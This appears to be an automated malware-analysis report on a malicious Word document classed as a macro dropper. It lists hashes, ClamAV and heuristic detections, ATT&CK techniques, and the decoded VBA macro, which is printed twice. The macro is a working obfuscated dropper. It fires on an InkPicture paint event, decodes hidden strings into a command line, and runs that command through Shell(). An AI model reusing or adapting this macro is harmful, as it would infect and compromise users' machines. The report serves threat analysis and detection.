Doc.Dropper.Agent-6598387-0 Office (OLE) malware analysis — malicious · a9dd3dcaf40248c7

MALICIOUS

Office (OLE)

79.5 KB Created: 2018-06-29 13:46:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 5d8ac5de73987cebef993da78f1e5773 SHA-1: 83effa6dcf6129aff768bfb350ebcc243e77c758 SHA-256: a9dd3dcaf40248c78dc178731c85d32688edde7ca3ee8a8a5b1c1ab0c9805994

142 Risk Score

Malware Insights

Doc.Dropper.Agent-6598387-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6598387-0. Critical heuristics indicate the presence of VBA macros and a Shell() call within those macros. The VBA code appears to be designed to execute a command via Shell(), likely to download and execute a secondary payload, as suggested by the 'Doc.Dropper' classification.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6598387-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6598387-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2802 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2802 bytes
SHA-256: `0dc1ec3eb7c6cf9d2bf585fcc353c3a7690ad33ed134ce2ff87c7a9adfa0bcfa`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "InkPicture1, 0, 0, MSINKAUTLib, InkPicture" Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle) UserForm1.TextBox3 = "1" End Sub Attribute VB_Name = "Module2" Function test2(ByRef text, dec, name) text = text + dec + name End Function Attribute VB_Name = "Module1" Function gnkruhl() Randomize leng = 6 * Rnd() + 4 name1 = "" For i = 1 To leng num = 24 * Rnd() + 97 name1 = name1 + Chr(num) Next i gnkruhl = name1 End Function Function DecodeString(text) decode = "" For i = 1 To Len(text) decode = decode + GetAlphabetSymbol(fghyut(Mid(text, i, 1)), 5) Next i DecodeString = decode End Function Function GetAlphabetSymbol(num, key) If num - key < 1 Then GetAlphabetSymbol = Mid(UserForm1.TextBox1, Len(UserForm1.TextBox1) + num - key, 1) Else GetAlphabetSymbol = Mid(UserForm1.TextBox1, num - key, 1) End If End Function Function fghyut(yuiuv) gutjh = UserForm1.TextBox1 jkdhf8 = Len(gutjh) For i = 1 To jkdhf8 If yuiuv = Mid(gutjh, i, 1) Then fghyut = i End If Next i End Function Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{C2E17B6D-ED6A-4836-AED7-E0749CFA13AD}{5A63530E-64B9-4FDD-9AE7-B27235148BEB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub TextBox2_Change() Shell UserForm1.TextBox2, 0 End Sub Private Sub TextBox3_Change() name1 = gnkruhl() name2 = gnkruhl() dec3 = DecodeString("};{(iu f'ci/ptjajpi)%(ip%ui'/bdi(p}%kfu(bfhkldbi{\") dec1 = DecodeString("/)kt[/tgfuiojxibbt]$gfuiojxibbt]]ls(/pdf(t") dec2 = DecodeString("{.jpod(z,t\") dec4 = DecodeString("_$$qp)gq\|") dec5 = DecodeString("%imi$$}:jphop gof/ijjt$$qp)gq\|") dec6 = DecodeString("%imi$$:-poa;") dec7 = DecodeString("{$$xppgr[[(oozho)i(p%/f)[jhoah/h(%'d($$}-/hp/x;") dec8 = DecodeString("{$$xppgr[[fhjdj gofci/pj%/f)[jhoah/h(%'d($$}-$]]tetfsp ldbit i(/fkd(zthj/ddt ldbighpxtqp)gq\|") name3 = gnkruhl() name4 = gnkruhl() text = "" test2 text, dec1, name1 test2 text, dec2, name2 test2 text, dec3, name2 test2 text, dec4, name3 test2 text, dec5, name3 test2 text, dec6, name1 test2 text, dec7, name1 dec9 = DecodeString("%'hp:tjphop gof/ijjt$qp)gq\|") dec10 = DecodeString("%'hp$t ud(kfujpabitxdkki(]") test2 text, dec8, name4 test2 text, dec9, name4 test2 text, dec10, "" UserForm1.TextBox2 = text End Sub

SHA-256: 0dc1ec3eb7c6cf9d2bf585fcc353c3a7690ad33ed134ce2ff87c7a9adfa0bcfa

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "InkPicture1, 0, 0, MSINKAUTLib, InkPicture"
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
UserForm1.TextBox3 = "1"
End Sub


Attribute VB_Name = "Module2"
Function test2(ByRef text, dec, name)
text = text + dec + name
End Function

Attribute VB_Name = "Module1"
Function gnkruhl()
Randomize
leng = 6 * Rnd() + 4
name1 = ""
For i = 1 To leng
num = 24 * Rnd() + 97
name1 = name1 + Chr(num)
Next i
gnkruhl = name1
End Function

Function DecodeString(text)
decode = ""
For i = 1 To Len(text)
decode = decode + GetAlphabetSymbol(fghyut(Mid(text, i, 1)), 5)
Next i
DecodeString = decode
End Function

Function GetAlphabetSymbol(num, key)
If num - key < 1 Then
GetAlphabetSymbol = Mid(UserForm1.TextBox1, Len(UserForm1.TextBox1) + num - key, 1)
Else
GetAlphabetSymbol = Mid(UserForm1.TextBox1, num - key, 1)
End If
End Function

Function fghyut(yuiuv)
gutjh = UserForm1.TextBox1
jkdhf8 = Len(gutjh)
For i = 1 To jkdhf8
If yuiuv = Mid(gutjh, i, 1) Then
fghyut = i
End If
Next i
End Function

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C2E17B6D-ED6A-4836-AED7-E0749CFA13AD}{5A63530E-64B9-4FDD-9AE7-B27235148BEB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub TextBox2_Change()
Shell UserForm1.TextBox2, 0
End Sub

Private Sub TextBox3_Change()
name1 = gnkruhl()
name2 = gnkruhl()
dec3 = DecodeString("};{(iu f'ci/ptjajpi)%(ip%ui'/bdi(p}%kfu(bfhkldbi{\")
dec1 = DecodeString("/)kt[/tgfuiojxibbt]$gfuiojxibbt]]ls(/pdf(t")
dec2 = DecodeString("{.jpod(z,t\")
dec4 = DecodeString("_$$qp)gq|")
dec5 = DecodeString("%imi$$}:jphop gof/ijjt$$qp)gq|")
dec6 = DecodeString("%imi$$:-poa;")
dec7 = DecodeString("{$$xppgr[[(oozho)i(p%/f)[jhoah/h(%'d($$}-/hp/x;")
dec8 = DecodeString("{$$xppgr[[fhjdj gofci/pj%/f)[jhoah/h(%'d($$}-$]]tetfsp ldbit i(/fkd(zthj/ddt ldbighpxtqp)gq|")
name3 = gnkruhl()
name4 = gnkruhl()
text = ""
test2 text, dec1, name1
test2 text, dec2, name2
test2 text, dec3, name2
test2 text, dec4, name3
test2 text, dec5, name3
test2 text, dec6, name1
test2 text, dec7, name1
dec9 = DecodeString("%'hp:tjphop gof/ijjt$qp)gq|")
dec10 = DecodeString("%'hp$t ud(kfujpabitxdkki(]")
test2 text, dec8, name4
test2 text, dec9, name4
test2 text, dec10, ""
UserForm1.TextBox2 = text
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.